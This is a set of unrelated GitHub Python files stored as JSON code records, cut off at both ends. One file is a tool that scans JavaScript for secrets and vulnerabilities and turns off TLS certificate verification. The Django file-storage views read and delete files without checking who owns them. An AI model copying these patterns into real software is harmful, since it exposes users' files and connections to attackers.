encoding='utf8',\n maxBytes=100000, backupCount=1),\n logging.StreamHandler()\n]\nroot_logger = logging.getLogger()\nroot_logger.setLevel(logging.DEBUG)\nfor h in handlers:\n h.setFormatter(f)\n h.setLevel(logging.DEBUG)\n root_logger.addHandler(h)\n##############################\n#### END LOGGING SETTINGS ####\n##############################\n\n\n####################################################\n#### LOGGING FILECONFIG SETTINGS (py26+, py30+) ####\n####################################################\n\n# logging.conf contents:\n\"\"\"\n[loggers]\nkeys=root\n[handlers]\nkeys=consoleHandler,rotateFileHandler\n[formatters]\nkeys=simpleFormatter\n[logger_root]\nlevel=DEBUG\nhandlers=consoleHandler,rotateFileHandler\n[handler_consoleHandler]\nclass=StreamHandler\nlevel=DEBUG\nformatter=simpleFormatter\nargs=(sys.stdout,)\n[handler_rotateFileHandler]\nclass=handlers.RotatingFileHandler\nlevel=DEBUG\nformatter=simpleFormatter\nargs=('rotated.log', 'a', 100000, 1, 'utf8')\n[formatter_simpleFormatter]\nformat=%(levelname)s:%(name)s: %(message)s (%(asctime)s; %(filename)s:%(lineno)d)\ndatefmt=%Y-%m-%d %H:%M:%S\n\"\"\"\n\nimport logging\nimport logging.config\nlogging.config.fileConfig('logging.conf', disable_existing_loggers=False)\n#########################################\n#### END LOGGING FILECONFIG SETTINGS ####\n#########################################\n\n\n####################################################\n#### LOGGING DICTCONFIG SETTINGS (py27+, py32+) ####\n####################################################\nimport logging\nimport logging.config\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '%(levelname)s:%(name)s: %(message)s '\n '(%(asctime)s; %(filename)s:%(lineno)d)',\n 'datefmt': \"%Y-%m-%d %H:%M:%S\",\n }\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'formatter': 'standard',\n 'class': 'logging.StreamHandler',\n },\n 'rotate_file': {\n 'level': 'DEBUG',\n 'formatter': 'standard',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': 'rotated.log',\n 'encoding': 'utf8',\n 'maxBytes': 100000,\n 'backupCount': 1,\n }\n },\n 'loggers': {\n '': {\n 'handlers': ['console', 'rotate_file'],\n 'level': 'DEBUG',\n },\n }\n}\nlogging.config.dictConfig(LOGGING)\n#########################################\n#### END LOGGING DICTCONFIG SETTINGS ####\n#########################################\n","repo_name":"voidabhi/flask","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121481746","text":"# https://atcoder.jp/contests/ddcc2016-qual/submissions/15761565\n# B - ステップカット\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n def calc(x):\n if 0 < x < n:\n return 2 * pow(r ** 2 - (r - 2 * r / n * x) ** 2, 0.5)\n else:\n return 0\n\n r, n, m = map(int, input().split())\n\n res = 0\n for i in range(1, n + m):\n res += max(calc(i), calc(i - m))\n print(res)\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/DDCC_2016_Qual/DDCC_2016_Qual-B.py","file_name":"DDCC_2016_Qual-B.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23581044130","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon 
Oct 1 11:38:08 2018\n\n@author: joey\n\n\n\"\"\"\n\ndef HexIn(hexadecimal):\n uphex = hexadecimal.upper()\n hexlist = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']\n decimal = 0\n \n for i in range(0, len(uphex)): \n if i > 0:\n if uphex[i] in hexlist:\n decimal *= 16\n decimal += hexlist.index(uphex[i])\n else:\n decimal += hexlist.index(uphex[i])\n \n print(\"\\ndecimal number =\\t\" + str(decimal))\n DecIn(decimal)\n \n \n \n \ndef DecIn(decimal):\n dec = int(decimal)\n n = 0\n power = 2**n\n \n while dec > power:\n n += 1\n power = 2**n\n if dec <= power:\n break\n \n if dec == 2**n: \n dec -= 2**n\n m = n-1\n else:\n dec -= 2**(n-1)\n m = n-2\n \n binary = '1'\n n2 = m\n \n for i in range(0, n2+1):\n if 2**m > dec:\n binary += '0'\n else:\n binary += '1'\n dec -= 2**m\n m -= 1\n \n print(\"binary number =\\t\" + binary)\n \n\n\ndef DecHex(decimal):\n dec = int(decimal)\n hexx = ''\n hexLst = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n if dec < 16:\n hexx = hexLst[dec]\n else:\n while dec >= 1:\n div = dec/16\n idiv = int(dec/16)\n rem = int((div-idiv)*16)\n \n hexx += hexLst[rem]\n dec = div\n \n hexx = hexx[::-1]\n\n #print((479/16-int(479/16))*16)\n print(\"\\nhex number =\\t\" + str(hexx))\n \n \n \ndef BinIn(binary):\n b2 = str(binary)\n l = len(b2)\n n = l - 1\n decimal = 0\n \n for i in range(0, l):\n if b2[i] == '1':\n decimal += (2**n) \n n -= 1\n print(\"binary number =\\t\" + str(decimal)+\"\\n\")\n DecHex(decimal)\n\n\n\n\n\n\noption = ''\n\nwhile option != '3':\n option = input(\"enter 0 for binary, 1 for decimal, 2 for hexadecimal, or 3 to quit:\\t\")\n \n if option == '0':\n user = input(\"enter binary number:\\t\")\n BinIn(user)\n \n elif option == '1':\n user = input(\"enter decimal number:\\t\")\n DecIn(user)\n DecHex(user)\n \n \n elif option == '2': \n user = input(\"enter hexadecimal number:\\t\")\n HexIn(user)\n","repo_name":"gamblinflanagan/binary-dec-hex","sub_path":"binary-dec-hex.py","file_name":"binary-dec-hex.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73022525265","text":"import urllib.request\r\nimport jsbeautifier\r\nimport ssl\r\nimport find_secrets as fs\r\nimport find_urls as fu\r\nimport find_vulns as fv\r\nimport json\r\nimport argparse\r\nimport sys\r\nimport time\r\nimport threading\r\nimport signal\r\nimport os\r\nfrom urllib.parse import urlparse\r\n\r\n## Spinner sin bibliotecas externas\r\nspinner_chars = '|/-\\\\' # Secuencia de caracteres para el spinner\r\nmensaje_actual = \"\"\r\n\r\ndef mostrar_spinner():\r\n i = 0\r\n while not detener_spinner_event.is_set():\r\n sys.stdout.write('\\r{} {}'.format(spinner_chars[i], mensaje_actual))\r\n sys.stdout.flush()\r\n time.sleep(0.1)\r\n i = (i + 1) % len(spinner_chars)\r\n\r\ndef print_especial(mensaje):\r\n global mensaje_actual\r\n sys.stdout.write('\\033[2K\\r') # Borrar la línea completa\r\n sys.stdout.flush()\r\n mensaje_actual = mensaje\r\n\r\ndef detener_spinner():\r\n detener_spinner_event.set()\r\n sys.stdout.write('\\r\\033[K') # Borrar la línea actual\r\n sys.stdout.flush()\r\n\r\n# Crear un evento para indicar que se debe detener el spinner\r\ndetener_spinner_event = threading.Event()\r\n\r\ndef manejar_interrupcion(signal, frame):\r\n print(\"Programa interrumpido por el usuario.\")\r\n detener_spinner()\r\n sys.exit(0)\r\n\r\n# Registrar el manejador de señal para la interrupción (Ctrl + 
C)\r\nsignal.signal(signal.SIGINT, manejar_interrupcion)\r\n\r\n## Descargar el archivo javascript y formatearlo\r\ndef analisis_completo(js_url, ruta_json):\r\n # Desactivar la verificación del certificado SSL\r\n ssl_context = ssl.create_default_context()\r\n ssl_context.check_hostname = False\r\n ssl_context.verify_mode = ssl.CERT_NONE\r\n print_especial(\"Descargando...\")\r\n try:\r\n with urllib.request.urlopen(js_url, context=ssl_context) as f:\r\n js_code = f.read().decode('utf-8')\r\n js_code = jsbeautifier.beautify(js_code)\r\n if args.storage_js:\r\n output_dir = os.path.join(args.storage_js, urlparse(js_url).netloc) # Directorio proporcionado por el usuario\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n file_name = os.path.join(output_dir, os.path.relpath(urlparse(js_url).path, '/'))\r\n with open(file_name, 'w') as js_file:\r\n js_file.write(js_code)\r\n\r\n print_especial(fv.buscar_vulns(ruta_json,js_url,js_code))\r\n print_especial(fu.buscar_urls(ruta_json,js_url,js_code))\r\n print_especial(fs.buscar_tokens(ruta_json,js_url,js_code))\r\n print_especial(fs.buscar_entropia(ruta_json,js_url, js_code))\r\n except Exception as e:\r\n print(\"Ocurrió un error al obtener el código JS:\", str(e))\r\n\r\ndef resultados_finales(ruta_json):\r\n with open(ruta_json, encoding=\"utf-8\") as archivo:\r\n data = json.load(archivo)\r\n \r\n for i in data:\r\n url_tmp = i[\"URL\"]\r\n print(f\"\\n*************\\nLos resultados del endpoint {url_tmp} son los siguientes:\\n\")\r\n\r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_endpoints\"])\r\n print(f\"{num_patterns} patrones coincidentes, en la búsqueda de endpoints\")\r\n for j in i[\"JS_Analisis\"][\"JS_Possible_endpoints\"]:\r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_endpoints\"][j][\"results\"])\r\n print(f\" Un total de {num_patterns} posibles {j}\")\r\n \r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_Vulns\"])\r\n print(f\"{num_patterns} patrones coincidentes, en el análisis de vulnerabilidades\")\r\n for j in i[\"JS_Analisis\"][\"JS_Possible_Vulns\"]:\r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_Vulns\"][j][\"results\"])\r\n print(f\" Un total de {num_patterns} de tipo {j}\")\r\n \r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Possible_tokens\"])\r\n print(f\"{num_patterns} patrones coincidentes, en la búsqueda de tokens\")\r\n \r\n num_patterns = len(i[\"JS_Analisis\"][\"JS_Entropy_Tokens\"][\"results\"])\r\n print(f\"{num_patterns} patrones coincidentes, en el análisis de entropía\")\r\n for j in i[\"JS_Analisis\"][\"JS_Entropy_Tokens\"][\"results\"]:\r\n match_tmp = j[\"match\"]\r\n print(f\" Posible token {match_tmp}\")\r\n \r\n print(\"\\n*************\\n\")\r\n\r\ndef crear_json_vacio(ruta_json):\r\n # Crear el json\r\n data = []\r\n with open(ruta_json, \"w\", encoding=\"utf-8\") as archivo:\r\n json.dump(data, archivo, indent=4, ensure_ascii=False)\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-u', '--urls-file', help='Archivo de URLs')\r\n parser.add_argument('-U', '--url', help='URL Única')\r\n parser.add_argument('-o', '--output', help='Archivo de salida')\r\n parser.add_argument('-s', '--storage-js', help='Indicar el directorio en el que almacenar el código JS')\r\n\r\n args = parser.parse_args()\r\n\r\n if args.output:\r\n ruta_json = args.output + \".json\"\r\n else:\r\n # Valor por defecto si no se proporciona el argumento\r\n ruta_json = \"js_analysis.json\"\r\n \r\n # Crear y ejecutar el hilo para 
mostrar el spinner\r\n spinner_thread = threading.Thread(target=mostrar_spinner)\r\n spinner_thread.start()\r\n\r\n if args.urls_file:\r\n fichero = args.urls_file \r\n ## Main ##\r\n print_especial(\"Comenzamos a descargar y analizar los archivos, este proceso puede tardar un rato\")\r\n # Lista para almacenar las URLs\r\n urls = []\r\n # Leer las URLs del archivo de texto\r\n with open(fichero, 'r') as f:\r\n urls = f.read().splitlines()\r\n # Crear un json vacío que se irá rellenando\r\n crear_json_vacio(ruta_json)\r\n # Llama a la función principal del programa\r\n for js_url in urls:\r\n analisis_completo(js_url,ruta_json)\r\n\r\n elif args.url:\r\n ## Main ##\r\n print_especial(\"Comenzamos a descargar y analizar los archivos, este proceso puede tardar un rato\")\r\n # Crear un json vacío que se irá rellenando\r\n crear_json_vacio(ruta_json)\r\n # Llama a la función principal del programa\r\n analisis_completo(args.url,ruta_json)\r\n\r\n else:\r\n # Detener el spinner\r\n detener_spinner()\r\n spinner_thread.join() # Esperar a que el hilo del spinner termine\r\n\r\n parser.error(\"Es necesario introducir un Input\")\r\n\r\n # Detener el spinner\r\n detener_spinner()\r\n spinner_thread.join() # Esperar a que el hilo del spinner termine\r\n\r\n print(f\"\\nLos resultados se encuentran en {ruta_json}\")\r\n resultados_finales(ruta_json)\r\n","repo_name":"barricadadigital/JScriptSeeker","sub_path":"JScriptSeeker.py","file_name":"JScriptSeeker.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11450580590","text":"import os\r\nfile = 'C\\\\Microsoft VS Code\\\\lab\\\\QUESTIONS'\r\nfile1 = open('tiff.txt', 'w')\r\np = os.listdir(file)\r\nsp = []\r\nsp1 = []\r\nfor i in p:\r\n if \".png\" in i:\r\n sp.append(i)\r\n if \".jpg\" in i:\r\n sp1.append(i)\r\n if \".tiff\" in i:\r\n file1.write(i + \"\\n\")\r\nL = len(sp)\r\nprint(\"Кількість файлів '.png' :\", L)\r\nprint(\"Файли з розширенням '.jpg' :\", sp1)\r\nfile1.close() ","repo_name":"MaksKulinich/MKG","sub_path":"lab10(2).py","file_name":"lab10(2).py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15427619306","text":"\"\"\"\r\nProcess job flow for dataA Dim Customer.\r\n\"\"\"\r\nfrom pyspark.sql import DataFrame\r\nfrom pyspark.sql.window import Window\r\nfrom pyspark.sql import functions as F\r\nfrom spark_process_common.process import BaseProcess, MISSING_DESC, MISSING_STRING_ID\r\n\r\nclass ProcessDimCustomerdataA(BaseProcess):\r\n\r\n def transform(self, sources: dict) -> DataFrame:\r\n \"\"\"\r\n Dim Customer records and attributes from dataA Sources\r\n \"\"\"\r\n spark = self.get_spark() \r\n mc = spark.read.orc(sources['mstr_customer_vw']['path'])\r\n mcy = spark.read.orc(sources['glb_mstr_country']['path'])\r\n mt = spark.read.orc(sources['glb_mstr_geo_territory']['path'])\r\n msr = spark.read.orc(sources['glb_mstr_geo_sub_region']['path'])\r\n mr = spark.read.orc(sources['glb_mstr_geo_region']['path'])\r\n ma = spark.read.orc(sources['glb_mstr_geo_area']['path'])\r\n ms = spark.read.orc(sources['glb_mstr_geo_state']['path'])\r\n\r\n df = (\r\n mc.join(mcy, [mcy.country_id == mc.country_id], 'left_outer')\r\n .join(mt, [mt.geo_territory_id == mcy.geo_territory_id], 'left_outer')\r\n .join(msr, [msr.geo_sub_region_id == mt.geo_sub_region_id], 'left_outer')\r\n .join(mr, [mr.geo_region_id == msr.geo_region_id], 
'left_outer')\r\n .join(ma, [ma.geo_area_id == mr.geo_area_id], 'left_outer')\r\n .join(ms, [ms.state_id == mc.state_id, ms.country_id == mc.country_id], 'left_outer')\r\n .select(\r\n mc.system_id, mc.customer_id, mc.customer_desc, mc.country_id, mcy.country_desc,\r\n mt.geo_territory_id, mt.geo_territory_desc, msr.geo_sub_region_id, msr.geo_sub_region_desc,\r\n mr.geo_region_id, mr.geo_region_desc, ma.geo_area_id, ma.geo_area_desc, ms.state_id,\r\n ms.state_desc, mc.county, mc.city, mc.postal_code, mc.top_10_desc \r\n )\r\n )\r\n\r\n df = df.withColumn('iptmeta_source_system', F.lit('dataA'))\r\n df = df.withColumn(\"customer_key\", F.concat_ws('_', df.system_id, df.customer_id))\r\n df = df.withColumn(\"customer_description\", F.coalesce(F.upper(df.customer_desc), F.lit(MISSING_DESC)))\r\n\r\n df = (\r\n df.withColumn(\"country_id\", F.coalesce(F.upper(df.country_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"country_description\", F.coalesce(F.upper(df.country_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"territory_id\", F.coalesce(F.upper(df.geo_territory_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"territory_description\", F.coalesce(F.upper(df.geo_territory_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"sub_region_id\", F.coalesce(F.upper(df.geo_sub_region_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"sub_region_description\", F.coalesce(F.upper(df.geo_sub_region_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"region_id\", F.coalesce(F.upper(df.geo_region_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"region_description\", F.coalesce(F.upper(df.geo_region_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"area_id\", F.coalesce(F.upper(df.geo_area_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"area_description\", F.coalesce(F.upper(df.geo_area_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"state_id\", F.coalesce(F.upper(df.state_id), F.lit(MISSING_STRING_ID)))\r\n .withColumn(\"state_description\", F.coalesce(F.upper(df.state_desc), F.lit(MISSING_DESC)))\r\n .withColumn(\"county\", F.coalesce(F.upper(df.county), F.lit(MISSING_DESC)))\r\n )\r\n\r\n df = df.withColumn(\"city\", F.coalesce(F.upper(df.city), F.lit(MISSING_DESC)))\r\n df = df.withColumn(\"postal_code\", F.coalesce(df.postal_code, F.lit(MISSING_DESC)))\r\n df = df.withColumn(\"commercial_parent\", F.coalesce(df.top_10_desc, F.lit(MISSING_DESC)))\r\n df = df.withColumn(\"brand_owner\", F.coalesce(df.customer_desc, df.top_10_desc, F.lit(MISSING_DESC)))\r\n\r\n df = df.withColumnRenamed('system_id', 'billing_system')\r\n \r\n df = df.select(\r\n df.billing_system, df.customer_id, df.brand_owner, df.iptmeta_source_system\r\n , df.customer_key, df.customer_description\r\n , df.country_id, df.country_description, df.territory_id, df.territory_description\r\n , df.sub_region_id, df.sub_region_description, df.region_id, df.region_description\r\n , df.area_id, df.area_description, df.state_id, df.state_description\r\n , df.county, df.city, df.postal_code, df.commercial_parent\r\n )\r\n\r\n return df","repo_name":"ektamishraniu/dataLake-process","sub_path":"dataLake_process/dim_customer_dataA.py","file_name":"dim_customer_dataA.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42042455093","text":"def main():\n\twidth = int(input('Enter the width of the box: '))\n\theight = int(input('Enter the height of the box: '))\n\tsymOut = input('Enter the symbol for the outline: ')\n\tsymIn = input('Enter the symbol to fill 
in: ')\n\tline = ''\n\tHrange = range(height)\n\tWrange = range(width)\n\tfor y in Hrange:\n\t\tif Hrange[y] == 0 or Hrange[y] == (height - 1):\n\t\t\tline = symOut * width\n\t\t\tprint(line)\n\t\telse:\n\t\t\tline = ''\n\t\t\tfor x in Wrange:\n\t\t\t\tif Wrange[x] == 0 or Wrange[x] == (width - 1):\n\t\t\t\t\tline = line + symOut\n\t\t\t\telse:\n\t\t\t\t\tline = line + symIn\n\t\t\tprint(line)\nmain()\n","repo_name":"MAPLE-Robot-Subgoaling/IPT","sub_path":"data/HW5/hw5_413.py","file_name":"hw5_413.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36194677394","text":"# Uses python3\nimport sys\n\ndef binary_search(a, x, ans = 0):\n    left, right = 0, len(a)\n    mid = (left + right)//2\n    if right == left:\n        return -1\n    y = a[mid]\n    if y == x:\n        return ans + mid\n    elif x < y: \n        return binary_search(a[left:mid], x, ans)\n    elif x > y:\n        ans += mid + 1\n        return binary_search(a[mid+1:right], x, ans)\n    return -1\n\nif __name__ == '__main__':\n    input = 
sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n m = data[n + 1]\n a = data[1 : n + 1]\n for x in data[n + 2:]:\n # replace with the call to binary_search when implemented\n print(binary_search(a, x), end = ' ')\n","repo_name":"attrung/Algorithms","sub_path":"UC San Diego Algorithms/Course1 Algorithm Toolbox/week4_divide_and_conquer/1_binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6734494255","text":"from django.http import Http404, FileResponse\nfrom drf_spectacular.utils import extend_schema, OpenApiResponse\nfrom rest_framework import status, generics, permissions, renderers, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom files.models import UserFile\nfrom files.serializers import (\n UserFileSerializer,\n PublicAccessSetterSerializer,\n DownloadSerializer,\n)\nfrom users.serializers import UserProfileUsedSpaceSerializer\n\n\nclass UserFileListView(generics.ListCreateAPIView):\n def get_queryset(self):\n # after get all files on DB it will be filtered by its owner and return the queryset\n owner_queryset = self.queryset.filter(owner=self.request.user)\n return owner_queryset\n\n queryset = UserFile.objects.get_queryset()\n serializer_class = UserFileSerializer\n permission_classes = (permissions.IsAuthenticated,)\n http_method_names = [\"get\", \"post\"]\n\n def get(self, request):\n queryset = self.get_queryset()\n serializer = UserFileSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n user_file_serializer = UserFileSerializer(data=request.data)\n UserProfile = self.request.user\n for filename in request.FILES:\n file_size = request.FILES[filename].size\n max_disk_space = UserProfile.disk_space\n current_used_space = UserProfile.used_space\n if (max_disk_space - current_used_space) < file_size:\n return Response(\n \"storage limit exceeded\", status=status.HTTP_400_BAD_REQUEST\n )\n new_used_space = current_used_space + file_size\n used_space_serializer = UserProfileUsedSpaceSerializer(\n UserProfile, data={\"used_space\": str(new_used_space)}, partial=True\n )\n if used_space_serializer.is_valid():\n used_space_serializer.save()\n\n if user_file_serializer.is_valid():\n user_file_serializer.save(\n owner=self.request.user,\n )\n return Response(user_file_serializer.data, status=status.HTTP_201_CREATED)\n return Response(user_file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserFileDetailView(generics.GenericAPIView):\n http_method_names = [\"get\", \"delete\", \"patch\"]\n serializer_class = UserFileSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def get_object(self, file_id):\n try:\n return UserFile.objects.get(file_id=file_id)\n except UserFile.DoesNotExist:\n raise Http404\n\n def get(self, request, file_id):\n UserFile = self.get_object(file_id)\n serializer = UserFileSerializer(UserFile)\n return Response(serializer.data)\n\n @extend_schema(\n summary=\"Set public access for file\",\n methods=[\"patch\"],\n responses={\n 200: OpenApiResponse(\n response=UserFileSerializer, description=\"Created. 
New user in response\"\n ),\n 400: OpenApiResponse(description=\"Bad request (something invalid)\"),\n },\n request=PublicAccessSetterSerializer\n )\n def patch(self, request, file_id):\n UserFile = self.get_object(file_id)\n serializer = PublicAccessSetterSerializer(\n UserFile, data=request.data, partial=True\n )\n if serializer.is_valid():\n serializer.save()\n return Response(UserFileSerializer(UserFile).data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, file_id):\n UserFile = self.get_object(file_id)\n UserProfile = self.request.user\n file_size = UserFile.filesize\n current_used_space = UserProfile.used_space\n new_used_space = current_used_space - file_size\n used_space_serializer = UserProfileUsedSpaceSerializer(\n UserProfile, data={\"used_space\": str(new_used_space)}, partial=True\n )\n UserFile.delete()\n if used_space_serializer.is_valid():\n used_space_serializer.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass PassthroughRenderer(renderers.BaseRenderer):\n \"\"\"\n Return data as-is. View should supply a Response.\n \"\"\"\n\n media_type = \"\"\n format = \"\"\n\n def render(self, data, accepted_media_type=None, renderer_context=None):\n return data\n\n\nclass DownloadViewSet(viewsets.ReadOnlyModelViewSet):\n http_method_names = [\"get\"]\n serializer_class = DownloadSerializer\n permission_classes = (permissions.IsAuthenticated,)\n\n def get_queryset(self):\n # after get all files on DB it will be filtered by its owner and return the queryset\n owner_queryset = self.queryset.filter(owner=self.request.user)\n return owner_queryset\n\n def get_object(self, file_id):\n try:\n return UserFile.objects.get(file_id=file_id)\n except UserFile.DoesNotExist:\n raise Http404\n\n @action(methods=[\"get\"], detail=True, renderer_classes=(PassthroughRenderer,))\n def download(self, request, file_id, *args, **kwargs):\n\n UserFile = self.get_object(file_id=file_id)\n # get an open file handle (I'm just using a file attached to the model for this example):\n file_handle = UserFile.file_object.open()\n\n # send file\n response = FileResponse(file_handle, content_type=\"whatever\")\n response[\"Content-Length\"] = UserFile.file_object.size\n response[\"Content-Disposition\"] = (\n 'attachment; filename=\"%s\"' % UserFile.file_object.name\n )\n\n return response\n\n\nclass PublicUserFileViewSet(viewsets.ReadOnlyModelViewSet):\n http_method_names = [\"get\"]\n serializer_class = DownloadSerializer\n\n def get_object(self, public_id):\n try:\n user_file = UserFile.objects.get(public_id=public_id)\n if user_file.public_access:\n print(\"access\")\n return user_file\n raise Http404\n except UserFile.DoesNotExist:\n raise Http404\n\n @action(methods=[\"get\"], detail=True, renderer_classes=(PassthroughRenderer,))\n def download(self, request, public_id, *args, **kwargs):\n\n UserFile = self.get_object(public_id=public_id)\n # get an open file handle (I'm just using a file attached to the model for this example):\n file_handle = UserFile.file_object.open()\n\n # send file\n response = FileResponse(file_handle, content_type=\"whatever\")\n response[\"Content-Length\"] = UserFile.file_object.size\n response[\"Content-Disposition\"] = (\n 'attachment; filename=\"%s\"' % UserFile.file_object.name\n )\n\n return 
response\n","repo_name":"tsiplenkov/django_cloud_storage","sub_path":"files/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26798967453","text":"import tensorflow.keras as keras\nimport tensorflow as tf\nimport numpy as np\nimport cv2\n \n \n \n#处理的12X12网络\ndef Pnet():\n input = tf.keras.Input(shape=[None, None, 3])\n x = tf.keras.layers.Conv2D(10, (3, 3), name='conv1',kernel_regularizer=keras.regularizers.l2(0.0005))(input)\n x = tf.keras.layers.PReLU(tf.constant_initializer(0.25),shared_axes=[1, 2], name='PReLU1')(x)\n x = tf.keras.layers.MaxPooling2D((2, 2))(x)\n x = tf.keras.layers.Conv2D(16, (3, 3),name='conv2',kernel_regularizer=keras.regularizers.l2(0.0005))(x)\n x = tf.keras.layers.PReLU(tf.constant_initializer(0.25),shared_axes=[1, 2], name='PReLU2')(x)\n x = tf.keras.layers.Conv2D(32, (3, 3),name='conv3',kernel_regularizer=keras.regularizers.l2(0.0005))(x)\n x = tf.keras.layers.PReLU(tf.constant_initializer(0.25),shared_axes=[1, 2], name='PReLU3')(x)\n classifier = tf.keras.layers.Conv2D(2, (1, 1), activation='softmax',name='conv4-1')(x)\n #如果input 是大于12*12,[1,2]不为1\n #cls_prob = tf.squeeze(classifier, [1, 2], name='cls_prob')\n bbox_regress = tf.keras.layers.Conv2D(4, (1, 1), name='conv4-2')(x)\n #bbox_pred = tf.squeeze(bbox_regress,[1,2],name='bbox_pred')\n #my code\n landmark_regress = tf.keras.layers.Conv2D(10, (1, 1), name='conv4-3')(x)\n model = tf.keras.models.Model([input], [classifier, bbox_regress, landmark_regress])\n return model\n \n#处理的24X24网络\ndef Rnet():\n \"\"\"定义RNet网络的架构\"\"\"\n input = tf.keras.Input(shape=[24, 24, 3])\n x = tf.keras.layers.Conv2D(28, (3, 3),strides=1,padding='valid',name='conv1')(input)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu1')(x)\n x = tf.keras.layers.MaxPooling2D(pool_size=3,strides=2,padding='same')(x)\n x = tf.keras.layers.Conv2D(48, (3, 3),strides=1,padding='valid',name='conv2')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu2')(x)\n x = tf.keras.layers.MaxPooling2D(pool_size=3,strides=2)(x)\n x = tf.keras.layers.Conv2D(64, (2, 2),strides=1,padding='valid',name='conv3')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu3')(x)\n x = tf.keras.layers.Permute((3, 2, 1))(x)\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(128, name='conv4')(x)\n x = tf.keras.layers.PReLU(name='prelu4')(x)\n classifier = tf.keras.layers.Dense(2,activation='softmax',name='conv5-1')(x)\n bbox_regress = tf.keras.layers.Dense(4, name='conv5-2')(x)\n landmark_regress = tf.keras.layers.Dense(10, name='conv5-3')(x)\n model = tf.keras.models.Model([input], [classifier, bbox_regress,landmark_regress])\n return model\n \n#处理的48X48网络\ndef Onet():\n \"\"\"定义ONet网络的架构\"\"\"\n input = tf.keras.layers.Input(shape=[48, 48, 3])\n # 48,48,3 -> 23,23,32\n x = tf.keras.layers.Conv2D(32, (3, 3),strides=1,padding='valid',name='conv1')(input)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu1')(x)\n x = tf.keras.layers.MaxPool2D(pool_size=3,strides=2,padding='same')(x)\n # 23,23,32 -> 10,10,64\n x = tf.keras.layers.Conv2D(64, (3, 3),strides=1,padding='valid',name='conv2')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu2')(x)\n x = tf.keras.layers.MaxPool2D(pool_size=3,strides=2)(x)\n # 8,8,64 -> 4,4,64\n x = tf.keras.layers.Conv2D(64, (3, 3),strides=1,padding='valid',name='conv3')(x)\n x = tf.keras.layers.PReLU(shared_axes=[1, 2],name='prelu3')(x)\n x = 
